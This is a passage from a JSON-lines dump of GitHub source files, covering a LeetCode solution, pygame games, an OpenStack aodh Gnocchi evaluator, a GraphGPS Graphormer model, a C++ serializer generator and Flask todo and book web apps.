Solution 1\n def missingNumber(self, nums: List[int]) -> int:\n tmp_nums = [False] * (len(nums) + 1)\n for num in nums:\n tmp_nums[num] = True\n for i in range(len(tmp_nums)):\n if tmp_nums[i] == False:\n return i\n \n # Solution 2\n def missingNumber2(self, nums: List[int]) -> int:\n n = len(nums)\n missing_num = int(n * (n + 1) / 2 - sum(nums))\n return missing_num\n","repo_name":"aeglushkov/leetcode-tasks","sub_path":"algorithms/Array/268. Missing Number/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7531732279","text":"import pygame\nimport gamemusic\nimport random\n\n\n# 掉落物类\nclass Drop:\n def __init__(self, tank, drop_type):\n self.image = None\n self.drop_type = drop_type\n self.music = None\n if drop_type == 'AddBullet':\n self.image = pygame.image.load('img/drop/AddBullet.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Clock':\n self.image = pygame.image.load('img/drop/Clock.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Gasoline':\n self.image = pygame.image.load('img/drop/Gasoline.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Kit':\n self.image = pygame.image.load('img/drop/Kit.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Net':\n self.image = pygame.image.load('img/drop/Net.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'PurpleBullet':\n self.image = pygame.image.load('img/drop/PurpleBullet.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Rage':\n self.image = pygame.image.load('img/drop/Rage.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'RedBullet':\n self.image = pygame.image.load('img/drop/RedBullet.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Shield':\n self.image = pygame.image.load('img/drop/Shield.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Snow':\n self.image = pygame.image.load('img/drop/Snow.png')\n self.music = gamemusic.Music('img/get_item.wav')\n elif drop_type == 'Star':\n self.image = pygame.image.load('img/drop/spare.png')\n self.music = gamemusic.Music('img/get_item.wav')\n else:\n raise ValueError('掉落物格式不匹配。')\n # 移动掉落物至坦克\n self.rect = self.image.get_rect().move(tank.rect.left, tank.rect.top)\n # 掉落物的状态,是否被拾取,如果被拾取,修改此状态\n self.live = True\n\n\n# 掉落物与坦克的碰撞\ndef drop_hit_tank(drop, MainGame, tank_type):\n if tank_type == 'EnemyTank':\n pass\n elif tank_type == 'PlayerTank':\n if MainGame.my_tank and MainGame.my_tank.live:\n if pygame.sprite.collide_rect(MainGame.my_tank, drop):\n ran = random.randint(1, 100)\n # 修改掉落物与我方坦克的状态\n drop.live = False\n if drop.drop_type == 'AddBullet':\n if ran <= 33:\n MainGame.AP_num += 5\n elif ran <= 66:\n MainGame.APCR_num += 5\n else:\n MainGame.HE_num += 5\n elif drop.drop_type == 'Kit':\n # 加血\n MainGame.my_tank.status.health = min(MainGame.my_tank.status.health + 100,\n MainGame.my_tank.status.max_health)\n elif drop.drop_type == 'Net':\n # 隐身网\n MainGame.my_tank.status.immune_t = 10000\n elif drop.drop_type == 'PurpleBullet':\n # 紫色炮弹\n MainGame.my_tank.status.add('Penetration', 0, 30, 10000)\n elif drop.drop_type == 'Rage':\n # 狂暴状态\n # 射速1.5倍\n MainGame.my_tank.status.add('FireRate', 1, -0.333, 10000)\n # 速度+2\n MainGame.my_tank.status.add('TankSpeed', 0, 2, 10000)\n elif drop.drop_type == 'RedBullet':\n # 红色炮弹\n MainGame.my_tank.status.add('Damage', 0, 60, 10000)\n elif drop.drop_type == 'Shield':\n # 护盾\n MainGame.my_tank.status.immune_c += 1\n elif drop.drop_type == 'Snow':\n # 雪花\n for enemy_tank in MainGame.enemyTankList:\n enemy_tank.status.add('TankSpeed', 1, -0.4, 5000)\n elif drop.drop_type == 'Gasoline':\n # 汽油\n MainGame.my_tank.status.add('TankSpeed', 0, 3, 10000)\n elif drop.drop_type == 'Star':\n pass\n elif drop.drop_type == 'Clock':\n MainGame.time += 30000\n else:\n raise ValueError('掉落物格式不匹配。')\n\n\n# 展示掉落物的方法\ndef display_drop(drop, main_game):\n # 将图片surface加载到窗口\n main_game.window.blit(drop.image, drop.rect)\n\n\n# 循环遍历敌方子弹列表,展示敌方子弹\ndef blit_drop(MainGame):\n for drop in MainGame.dropList:\n if drop.live: # 判断掉落物是否存活\n display_drop(drop, MainGame)\n\n\n# 循环遍历掉落物列表\ndef check_drop(MainGame):\n for drop in MainGame.dropList:\n if drop.live: # 判断敌方子弹是否存活\n # 调用敌方子弹与我方坦克碰撞的方法\n drop_hit_tank(drop, MainGame, 'PlayerTank')\n else:\n drop.music.play()\n MainGame.dropList.remove(drop)\n","repo_name":"zzzgod/SoulTank","sub_path":"gamedrop.py","file_name":"gamedrop.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9366511442","text":"import json\n\nfrom gnocchiclient import client\nfrom gnocchiclient import exceptions\nfrom oslo_log import log\n\nfrom aodh.evaluator import threshold\nfrom aodh import keystone_client\n\nLOG = log.getLogger(__name__)\n\n# The list of points that Gnocchi API returned is composed\n# of tuples with (timestamp, granularity, value)\nGRANULARITY = 1\nVALUE = 2\n\n\nclass GnocchiBase(threshold.ThresholdEvaluator):\n def __init__(self, conf):\n super(GnocchiBase, self).__init__(conf)\n self._gnocchi_client = client.Client(\n '1', keystone_client.get_session(conf),\n adapter_options={\n 'interface': conf.service_credentials.interface,\n 'region_name': conf.service_credentials.region_name})\n\n @staticmethod\n def _sanitize(rule, statistics):\n \"\"\"Return the datapoints that correspond to the alarm granularity\"\"\"\n # TODO(sileht): if there's no direct match, but there is an archive\n # policy with granularity that's an even divisor or the period,\n # we could potentially do a mean-of-means (or max-of-maxes or whatever,\n # but not a stddev-of-stddevs).\n # TODO(sileht): support alarm['exclude_outliers']\n LOG.debug('sanitize stats %s', statistics)\n # NOTE(jamespage)\n # Dynamic Aggregates are returned in a dict struct so\n # check for this first.\n if isinstance(statistics, dict):\n # Pop array of measures from aggregated subdict\n statistics = statistics['measures']['aggregated']\n statistics = [stats[VALUE] for stats in statistics\n if stats[GRANULARITY] == rule['granularity']]\n if not statistics:\n raise threshold.InsufficientDataError(\n \"No datapoint for granularity %s\" % rule['granularity'], [])\n statistics = statistics[-rule['evaluation_periods']:]\n LOG.debug('pruned statistics to %d', len(statistics))\n return statistics\n\n\nclass GnocchiResourceThresholdEvaluator(GnocchiBase):\n def _statistics(self, rule, start, end):\n try:\n return self._gnocchi_client.metric.get_measures(\n metric=rule['metric'],\n granularity=rule['granularity'],\n start=start, stop=end,\n resource_id=rule['resource_id'],\n aggregation=rule['aggregation_method'])\n except exceptions.MetricNotFound:\n raise threshold.InsufficientDataError(\n 'metric %s for resource %s does not exists' %\n (rule['metric'], rule['resource_id']), [])\n except exceptions.ResourceNotFound:\n raise threshold.InsufficientDataError(\n 'resource %s does not exists' % rule['resource_id'], [])\n except exceptions.NotFound:\n # TODO(sileht): gnocchiclient should raise a explicit\n # exception for AggregationNotFound, this API endpoint\n # can only raise 3 different 404, so we are safe to\n # assume this is an AggregationNotFound for now.\n raise threshold.InsufficientDataError(\n 'aggregation %s does not exist for '\n 'metric %s of resource %s' % (rule['aggregation_method'],\n rule['metric'],\n rule['resource_id']),\n [])\n except Exception as e:\n msg = 'alarm statistics retrieval failed: %s' % e\n LOG.warning(msg)\n raise threshold.InsufficientDataError(msg, [])\n\n\nclass GnocchiAggregationMetricsThresholdEvaluator(GnocchiBase):\n def _statistics(self, rule, start, end):\n try:\n _operations = [\n 'aggregate', rule['aggregation_method']\n ]\n for metric in rule['metrics']:\n _operations.append(\n [\n 'metric', metric,\n rule['aggregation_method'].lstrip('rate:')\n ]\n )\n # FIXME(sileht): In case of a heat autoscaling stack decide to\n # delete an instance, the gnocchi metrics associated to this\n # instance will be no more updated and when the alarm will ask\n # for the aggregation, gnocchi will raise a 'No overlap'\n # exception.\n # So temporary set 'needed_overlap' to 0 to disable the\n # gnocchi checks about missing points. For more detail see:\n # https://bugs.launchpad.net/gnocchi/+bug/1479429\n return self._gnocchi_client.aggregates.fetch(\n operations=_operations,\n granularity=rule['granularity'],\n start=start, stop=end,\n needed_overlap=0)\n except exceptions.MetricNotFound:\n raise threshold.InsufficientDataError(\n 'At least of metrics in %s does not exist' %\n rule['metrics'], [])\n except exceptions.NotFound:\n # TODO(sileht): gnocchiclient should raise a explicit\n # exception for AggregationNotFound, this API endpoint\n # can only raise 3 different 404, so we are safe to\n # assume this is an AggregationNotFound for now.\n raise threshold.InsufficientDataError(\n 'aggregation %s does not exist for at least one '\n 'metrics in %s' % (rule['aggregation_method'],\n rule['metrics']), [])\n except Exception as e:\n msg = 'alarm statistics retrieval failed: %s' % e\n LOG.warning(msg)\n raise threshold.InsufficientDataError(msg, [])\n\n\nclass GnocchiAggregationResourcesThresholdEvaluator(GnocchiBase):\n def _statistics(self, rule, start, end):\n try:\n # FIXME(sileht): In case of a heat autoscaling stack decide to\n # delete an instance, the gnocchi metrics associated to this\n # instance will be no more updated and when the alarm will ask\n # for the aggregation, gnocchi will raise a 'No overlap'\n # exception.\n # So temporary set 'needed_overlap' to 0 to disable the\n # gnocchi checks about missing points. For more detail see:\n # https://bugs.launchpad.net/gnocchi/+bug/1479429\n return self._gnocchi_client.aggregates.fetch(\n operations=[\n 'aggregate', rule['aggregation_method'],\n [\n 'metric', rule['metric'],\n rule['aggregation_method'].lstrip('rate:')\n ]\n ],\n granularity=rule['granularity'],\n search=json.loads(rule['query']),\n resource_type=rule[\"resource_type\"],\n start=start, stop=end,\n needed_overlap=0)\n except exceptions.MetricNotFound:\n raise threshold.InsufficientDataError(\n 'metric %s does not exists' % rule['metric'], [])\n except exceptions.NotFound:\n # TODO(sileht): gnocchiclient should raise a explicit\n # exception for AggregationNotFound, this API endpoint\n # can only raise 3 different 404, so we are safe to\n # assume this is an AggregationNotFound for now.\n raise threshold.InsufficientDataError(\n 'aggregation %s does not exist for at least one '\n 'metric of the query' % rule['aggregation_method'], [])\n except Exception as e:\n msg = 'alarm statistics retrieval failed: %s' % e\n LOG.warning(msg)\n raise threshold.InsufficientDataError(msg, [])\n","repo_name":"openstack/aodh","sub_path":"aodh/evaluator/gnocchi.py","file_name":"gnocchi.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"2321258813","text":"import os\n# To use a consistent encoding\nfrom codecs import open\n\nimport setuptools\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"vit-vqgan\",\n version=\"0.0.1\",\n description=\"JAX implementation of ViT-VQGAN\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n packages=setuptools.find_packages(),\n install_requires=[\"jax>=0.2.6\", \"flax\", \"transformers\", \"lpips-j\"],\n)\n","repo_name":"patil-suraj/vit-vqgan","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"41991412379","text":"# This is using just flask, not marshmallow.\n\nfrom flask import Flask, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport os\n\napp = Flask(__name__)\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = \"sqlite:///\" + os.path.join(basedir, \"app.sqlite\")\n\nCORS(app)\n\ndb = SQLAlchemy(app)\n\n# to this point it's boilerplate. Code Snippet?\n# pipenv install, run things in the shell.\n# make sure you install flask, and the flask alchemy / cors etc. to your pipenv before running the prog.\n# in pipenv, enter python, from app import db, db.create_all()\n\nclass Todo(db.Model):\n __tablename__ = \"todos\"\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100), nullable = False) # 100 = character limit, nullable means has to have some input (can't be empty)\n done = db.Column(db.Boolean)\n\n\n def __init__(self, title, done):\n self.title = title\n self.done = done\n\n@app.route(\"/todos\", methods=[\"GET\"])\ndef get_todos():\n all_todos = db.session.query(Todo.id, Todo.title, Todo.done).all()\n return jsonify(all_todos)\n\n@app.route(\"/add-todo\", methods=[\"POST\"])\ndef add_todo():\n if request.content_type == \"application/json\":\n post_data = request.get_json()\n\n title = post_data.get(\"title\")\n done = post_data.get(\"done\")\n\n record = Todo(title, done)\n db.session.add(record)\n db.session.commit()\n return jsonify([record.id, record.title, record.done])\n return jsonify(\"Check content_type and try again\")\n\n@app.route(\"/todo/\", methods=[\"PUT\"])\ndef update_todo(id):\n if request.content_type == \"application/json\":\n put_data = request.get_json()\n\n title = put_data.get(\"title\")\n done = put_data.get(\"done\")\n\n record = db.session.query(Todo).get(id)\n record.title = title\n record.done = done \n \n db.session.commit()\n return jsonify(\"Update Successful\")\n return jsonify(\"Check content_type and try again\")\n\n@app.route(\"/todo/\", methods=[\"DELETE\"])\ndef delete_todo(id):\n record = db.session.query(Todo).get(id)\n db.session.delete(record)\n db.session.commit()\n\n return jsonify(\"Record DELETED!!\") \n\n# if __name__ ==\"__main__\":\n # app.debug = True\n # app.run()","repo_name":"ChrisStreadbeck/todo-list-API","sub_path":"app_flask.py","file_name":"app_flask.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"35865432382","text":"import pygame\nfrom color.Color import *\nfrom follow_player.player.Player import Player\nfrom follow_player.enemy.Enemy import Enemy\nfrom vector.Vector import Vector\nfrom follow_player.settings.Settings import screen_height, screen_width\n\n\nclass Game:\n def __init__(self):\n pygame.init()\n self.__screen = pygame.display.set_mode([screen_width, screen_height])\n self.__clock = pygame.time.Clock()\n self.__player = Player(self.__screen, Vector(screen_width / 2 - 25, screen_height / 2 - 25), 50, 50)\n self.__enemies = [\n Enemy(self.__screen, Vector(0, 0), self.__player.get_player_center()),\n Enemy(self.__screen, Vector(screen_width - 50, screen_height - 50), self.__player.get_player_center()),\n Enemy(self.__screen, Vector(screen_width - 50, 0), self.__player.get_player_center()),\n Enemy(self.__screen, Vector(0, screen_height - 50), self.__player.get_player_center())\n ]\n\n @staticmethod\n def __quit_program():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n return False\n return True\n\n def __check_collision(self):\n for enemy in self.__enemies:\n if enemy.alive:\n self.__collision_detection(self.__player, enemy)\n for e in self.__enemies:\n if e.alive and (e is not enemy):\n self.__collision_detection(e, enemy)\n\n @staticmethod\n def __collision_detection(rect1, rect2):\n rect1_top = rect1.get_vector()\n rect1_bottom = Vector(rect1.get_vector().x + rect1.get_width(), rect1.get_vector().y + rect1.get_height())\n\n rect2_top = rect2.get_vector()\n rect2_bottom = Vector(rect2.get_vector().x + rect2.get_width(), rect2.get_vector().y + rect2.get_height())\n\n if ((rect1_bottom.x >= rect2_top.x >= rect1_top.x) or (rect1_bottom.x >= rect2_bottom.x >= rect1_top.x))\\\n and (\n (rect1_bottom.y >= rect2_top.y >= rect1_top.y) or (rect1_bottom.y >= rect2_bottom.y >= rect1_top.y)\n ):\n rect1.alive = False\n rect2.alive = False\n\n def check_enemy_lives(self):\n alive = True\n for enemy in self.__enemies:\n if enemy.alive:\n alive = False\n return alive\n\n def update(self):\n self.__player.update()\n for enemy in self.__enemies:\n enemy.update()\n self.__check_collision()\n\n def draw(self):\n self.__player.draw()\n for enemy in self.__enemies:\n enemy.draw()\n\n def run(self):\n run_game = True\n font = pygame.font.Font('freesansbold.ttf', 32)\n\n while run_game:\n self.__screen.fill(white)\n if not self.__player.alive:\n self.__screen.fill(red)\n text = font.render('You lose!!', True, white)\n text_rect = text.get_rect()\n text_rect.center = (screen_width // 2, screen_height // 2)\n self.__screen.blit(text, text_rect)\n elif self.check_enemy_lives():\n self.__screen.fill(green)\n text = font.render('You win!!', True, white)\n text_rect = text.get_rect()\n text_rect.center = (screen_width // 2, screen_height // 2)\n self.__screen.blit(text, text_rect)\n else:\n self.update()\n self.draw()\n\n run_game = self.__quit_program()\n\n pygame.display.update()\n self.__clock.tick(90)\n quit()\n\n\ngame = Game()\ngame.run()\n","repo_name":"JoZonneveld/TCR_pygame","sub_path":"follow_player/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31498895214","text":"import sys\nimport os\nimport CppHeaderParser\n\nheaders = []\nclasses = []\n\ntype_only = None\ntype_only_others = []\n\n\nclass CPPAttribute:\n def __init__(self, name, type):\n self.name = name\n self.type = type\n\n def __repr__(self):\n return str((self.name, self.type))\n\n\nclass CPPClass:\n\n def __init__(self):\n self.name = \"\"\n self.parent = None\n self.file = \"\"\n self.attrs = []\n\n def __repr__(self):\n return str((self.name, self.file, self.attrs))\n\n def generate_code(self):\n output_string = f'void {self.name}::serialize(TCODZip* zip) {{\\n'\n\n # Serialize\n if self.parent is not None:\n output_string += f'\\t{self.parent}::serialize(zip);\\n'\n\n for i in self.attrs:\n real_type = i.type\n\n if i.type.split()[0] == 'static':\n i.type = i.type.split()[1]\n\n if i.type == 'int' or i.type == 'unsigned int' or i.type == 'long' or i.type == 'unsigned long'\\\n or i.type == 'bool' or i.type == 'long long' or i.type == 'unsigned long long':\n output_string += f'\\tzip->putInt({i.name});\\n'\n elif i.type == 'char' or i.type == 'unsigned char':\n output_string += f'\\tzip->putChar({i.name});\\n'\n elif i.type == 'const char*':\n output_string += f'\\tzip->putString({i.name});\\n'\n elif i.type == 'std::string':\n output_string += f'\\tzip->putString({i.name}.c_str());\\n'\n elif i.type == 'float' or i.type == 'double':\n output_string += f'\\tzip->putFloat({i.name});\\n'\n elif i.type == 'TCODColor':\n output_string += f'\\tzip->putColor(&{i.name});\\n'\n elif i.type == 'TCODConsole':\n output_string += f'\\tzip->putConsole({i.name});\\n'\n else:\n output_string += f'\\t{i.name}.serialize(zip); // {real_type}\\n'\n output_string += '}\\n\\n'\n\n output_string += f'void {self.name}::deserialize(TCODZip* zip) {{\\n'\n\n # Deserialize\n if self.parent is not None:\n output_string += f'\\t{self.parent}::deserialize(zip);\\n'\n\n for i in self.attrs:\n real_type = i.type\n\n if i.type.split()[0] == 'static':\n i.type = i.type.split()[1]\n\n if i.type == 'int' or i.type == 'unsigned int' or i.type == 'long' or i.type == 'unsigned long'\\\n or i.type == 'bool':\n output_string += f'\\t{i.name} = zip->getInt();\\n'\n elif i.type == 'char' or i.type == 'unsigned char':\n output_string += f'\\t{i.name} = zip->getChar();\\n'\n elif i.type == 'const char*':\n output_string += f'\\t{i.name} = zip->getString();\\n'\n elif i.type == 'std::string':\n output_string += f'\\t{i.name} = zip->getString();\\n'\n elif i.type == 'float' or i.type == 'double':\n output_string += f'\\t{i.name} = zip->getFloat();\\n'\n elif i.type == 'TCODColor':\n output_string += f'\\t{i.name} = zip->getColor();\\n'\n elif i.type == 'TCODConsole':\n output_string += f'\\t{i.name} = zip->getConsole();\\n'\n else:\n output_string += f'\\t{i.name}.deserialize(zip); // {real_type}\\n'\n output_string += '}\\n\\n'\n\n return output_string\n\n\ndef parse_file(file):\n parser = CppHeaderParser.CppHeader(file)\n print(len(parser.classes), file)\n for i in parser.classes_order:\n obj = CPPClass()\n obj.name = i['name']\n obj.file = os.fsdecode(file)\n if len(i['inherits']) != 0:\n obj.parent = i['inherits'][0]['class']\n for access in ['public', 'protected', 'private']:\n for j in i['properties'][access]:\n if not (j['pointer'] and j['type'].split()[0] == 'const'):\n if j['pointer'] == 1:\n continue\n if j['type'].split()[0] == 'const':\n continue\n obj.attrs.append(CPPAttribute(j['name'], j['type']))\n classes.append(obj)\n\n\ndef fill_type_only_others():\n times = 1\n while times > 0:\n times = 0\n for c in classes:\n if (c.parent == type_only or c.parent in type_only_others) and c.name not in type_only_others:\n type_only_others.append(c.name)\n if times == 0:\n times = 1\n\n\ndef add_helper_function():\n string = ''\n string += 'template \\n'\n string += f'static {type_only}* create_{type_only.lower()}_instance() {{ return new T; }}\\n\\n'\n string += f'std::map type_map = {{\\n'\n for c in classes:\n if c.name == type_only or c.parent == type_only \\\n or c.parent in type_only_others or c.name in type_only_others:\n string += f'\\t{{ typeid({c.name}).name(), create_{type_only.lower()}_instance<{c.name}> }},\\n'\n string += '};\\n'\n return string\n\nfor file in os.listdir(os.fsdecode(sys.argv[1])):\n filename = os.fsdecode(file)\n if filename.endswith('.h'):\n headers.append(filename)\n\nos.chdir(sys.argv[1])\n\nif len(sys.argv) > 2:\n type_only = sys.argv[2]\n\nfor h in headers:\n parse_file(h)\n\nfinal_output = \"\"\n\nfill_type_only_others()\n\nfor c in classes:\n if type_only is not None:\n if c.name == type_only or c.parent == type_only \\\n or c.parent in type_only_others or c.name in type_only_others:\n final_output += f'// {c.file} - {c.name} - inherits {c.parent}\\n'\n final_output += c.generate_code()\n else:\n final_output += f'// {c.file} - {c.name} - inherits {c.parent}\\n'\n final_output += c.generate_code()\n\nif type_only is not None:\n final_output += '// Helps deserialize derived types\\n\\n'\n final_output += add_helper_function()\n\n\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\n\nwith open('serializer_output.cpp', 'w') as f:\n f.write(final_output)\n\nprint('Done')\n\n","repo_name":"Steelsphere/tcod_sl_code_generator","sub_path":"serialize_code_generator.py","file_name":"serialize_code_generator.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"44726830445","text":"UID_ON_OFF = 1\nUID_USER_MODE = 2\nUID_FAN_SPEED = 4\nUID_VANE_UP_DOWN_POSITION = 5\nUID_USER_SETPOINT = 9\nUID_RETURN_PATH_TEMPERATURE = 10\nUID_REMOTE_DISABLE = 12\nUID_ON_TIME = 13\nUID_ALARM_STATUS = 14\nUID_ERROR_CODE = 15\nUID_MIN_TEMPERATURE_SETPOINT = 35\nUID_MAX_TEMPERATURE_SETPOINT = 36\nUID_OUTDOOR_TEMPERATURE = 37\nUID_MAINTENANCE_TIME = 181\nUID_MAINTENANCE_CONFIG = 182\nUID_MAINTENANCE_FILTER_TIME = 183\nUID_MAINTENANCE_FILTER_CONFIG = 184\n\nuidLabels={\n 1:\"On/off\",\n 2:\"User Mode\",\n 4:\"Fan Speed\",\n 5:\"Vane Up/Down position\",\n 9:\"User Setpoint\",\n 10:\"Return Path Temperature\",\n 12:\"Remote Disable\",\n 13:\"On Time\",\n 14:\"Alarm Status\",\n 15:\"Error Code\",\n 35:\"Min Temperature Setpoint\",\n 36:\"Max Temperature Setpoint\",\n 37:\"Outdoor Temperature\",\n 181:\"Maintenance time\",\n 182:\"Maintenance config\",\n 183:\"Maintenance Filter time\",\n 184:\"Maintenance Filter config\"\n}\n\ndatapointLabels = {\n 1: {0:'Off',1:'On'}, \n 2: {0:'Auto', 1:'Heat', 2:'Dry', 3:'Fan', 4:'Cool'},\n 4: {1:'Speed 1', 2:'Speed 2', 3:'Speed 3', 4:'Speed 4'},\n 5: {1:'Position 1', 2:'Position 2', 3:'Position 3', 4:'Position 4', 10:'Swing'},\n 12: {0:'Remote Enabled',1:'Remote Disabled'}, \n 14: {0:'Off',1:'On'}\n}\n\n","repo_name":"mchlt/intesisHome-py","sub_path":"code/IHconstants.py","file_name":"IHconstants.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30861050532","text":"import torch\nimport torch_geometric.graphgym.register as register\nfrom torch_geometric.graphgym.config import cfg\nfrom torch_geometric.graphgym.models.gnn import FeatureEncoder, GNNPreMP\nfrom torch_geometric.graphgym.register import register_network\n\nfrom graphgps.layer.graphormer_layer import GraphormerLayer\n\n\n@register_network('Graphormer')\nclass GraphormerModel(torch.nn.Module):\n \"\"\"Graphormer port to GraphGPS.\n https://arxiv.org/abs/2106.05234\n Ying, C., Cai, T., Luo, S., Zheng, S., Ke, G., He, D., ... & Liu, T. Y.\n Do transformers really perform badly for graph representation? (NeurIPS2021)\n \"\"\"\n\n def __init__(self, dim_in, dim_out):\n super().__init__()\n self.encoder = FeatureEncoder(dim_in)\n dim_in = self.encoder.dim_in\n\n if cfg.gnn.layers_pre_mp > 0:\n self.pre_mp = GNNPreMP(\n dim_in, cfg.gnn.dim_inner, cfg.gnn.layers_pre_mp)\n dim_in = cfg.gnn.dim_inner\n\n if not cfg.graphormer.embed_dim == cfg.gnn.dim_inner == dim_in:\n raise ValueError(\n f\"The inner and embed dims must match: \"\n f\"embed_dim={cfg.graphormer.embed_dim} \"\n f\"dim_inner={cfg.gnn.dim_inner} dim_in={dim_in}\"\n )\n\n layers = []\n for _ in range(cfg.graphormer.num_layers):\n layers.append(GraphormerLayer(\n embed_dim=cfg.graphormer.embed_dim,\n num_heads=cfg.graphormer.num_heads,\n dropout=cfg.graphormer.dropout,\n attention_dropout=cfg.graphormer.attention_dropout,\n mlp_dropout=cfg.graphormer.mlp_dropout\n ))\n self.layers = torch.nn.Sequential(*layers)\n\n GNNHead = register.head_dict[cfg.gnn.head]\n self.post_mp = GNNHead(dim_in=cfg.gnn.dim_inner, dim_out=dim_out)\n\n def forward(self, batch):\n for module in self.children():\n batch = module(batch)\n return batch\n","repo_name":"rampasek/GraphGPS","sub_path":"graphgps/network/graphormer.py","file_name":"graphormer.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":495,"dataset":"github-code","pt":"53"} +{"seq_id":"70182121769","text":"from app import app\nfrom flask import render_template, redirect, request, flash, session, url_for, escape\nimport model\nfrom forms import RegistrationForm, AmazonSearch, LoginForm, BookSearch, UpdateUser\nfrom wtforms import Form, BooleanField, StringField, validators\nfrom search_amazon import get_book_by_title_author, get_book_info\nimport config \nfrom config import *\nimport hashlib\nfrom sqlalchemy import distinct\nfrom datetime import datetime\nfrom twilio.rest import TwilioRestClient\n\n\nclient = TwilioRestClient(config.account_sid, config.auth_token)\nmy_phone = config.my_phone\ntwilio_phone = config.twilio_phone\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n\tif \"email\" in session:\n\t\tuser = model.session.query(model.User).filter_by(email=session[\"email\"]).one()\n\telse:\n\t\tuser = None\n\treturn render_template(\"index.html\", title=\"Home\", user=user)\n\n@app.route(\"/user/new\", methods=[\"GET\"])\ndef new_user_form():\n\t#Display HTML form to create a new user\n\tform = RegistrationForm()\n\treturn render_template(\"new_user_form.html\", form=form)\n\n@app.route(\"/user/new\", methods=[\"POST\"])\ndef add_new_user():\n\tsalt = PASSWORD_SALT\n\t#Get data from Registration Form\n\tform = RegistrationForm(request.form)\n\tif not form.validate():\n\t\tflash(\"All fields are required.\")\n\t\treturn render_template(\"new_user_form.html\", form=form)\n\tgiven_name = form.given_name.data\n\tsurname = form.surname.data\n\temail = form.email.data\n\tpassword = hashlib.sha1(form.password.data+salt).hexdigest()\n\tuser_exist = model.session.query(model.User).filter_by(email=email).all()\n\t#check to see if user exists\n\tif user_exist:\n\t\tflash(\"User account has already been created with this email.\")\n\t\treturn render_template(\"login_user.html\", form=form)\n\t#create user object\n\tuser = model.User(given_name=given_name, surname=surname, email=email, password=password, admin=0)\n\tmodel.session.add(user)\n\tmodel.session.commit()\n\tsession[\"email\"] = email\n\tif form.validate_on_submit():\n\t\tflash (\"Your account has been created, \" + form.given_name.data + \".\")\t\t\n\t\treturn redirect(\"/index\")\n\treturn redirect(\"/user/new\")\n\n@app.route(\"/user/login\", methods=[\"GET\"])\ndef user_login_form():\n\tform = LoginForm()\n\treturn render_template(\"login_user.html\", form=form)\n\n@app.route(\"/user/login\", methods=[\"POST\"])\ndef user_login():\t\n\tsalt = PASSWORD_SALT\n\tform = LoginForm(request.form)\n\temail = form.email.data\n\tpassword = hashlib.sha1(form.password.data+salt).hexdigest()\n\tuser_list = model.session.query(model.User).filter_by(email=email, password=password).all()\n\tif user_list:\t\n\t\tsession[\"email\"] = email\n\t\tif user_list[0].admin == 1:\n\t\t\tsession[\"admin\"] = True\n\t\telse:\n\t\t\tsession[\"admin\"] = False\n\t\tgiven_name = user_list[0].given_name\n\t\tflash(\"You are authenticated, \" + given_name + \".\")\n\t\treturn redirect(\"/index\")\n\telse:\n\t\tflash(\"User not authenticated.\")\n\t\treturn render_template(\"login_user.html\", form=form)\n\n@app.route(\"/user/logout\")\ndef logout():\n\tsession.clear()\n\tflash(\"You are now logged out.\")\n\treturn redirect(\"/index\")\n\n@app.route(\"/user//edit\")\ndef edit_user(id):\n\tcurrent_user = model.session.query(model.User).get(id)\n\tif not current_user:\t\n\t\tflash (\"You are not logged in.\")\n\tform = UpdateUser()\n\treturn render_template(\"update_user.html\", user=current_user, form=form)\n\n@app.route(\"/user//update\",methods=[\"POST\"])\ndef update_user(id):\n\tsalt = PASSWORD_SALT\n\tform = UpdateUser(request.form)\n\tcurrent_user = model.session.query(model.User).get(id)\n\tif not current_user:\n\t\tflash (\"You are not logged in.\")\n\n\tuser_save = False\t\n\n\tform = UpdateUser(request.form)\n\tif form.given_name and form.given_name.data != '':\n\t\tcurrent_user.given_name = form.given_name.data\n\t\tuser_save = True\n\tif form.surname and form.surname.data != '':\n\t\tcurrent_user.surname = form.surname.data\n\t\tuser_save = True\n\tif form.email and form.email.data != 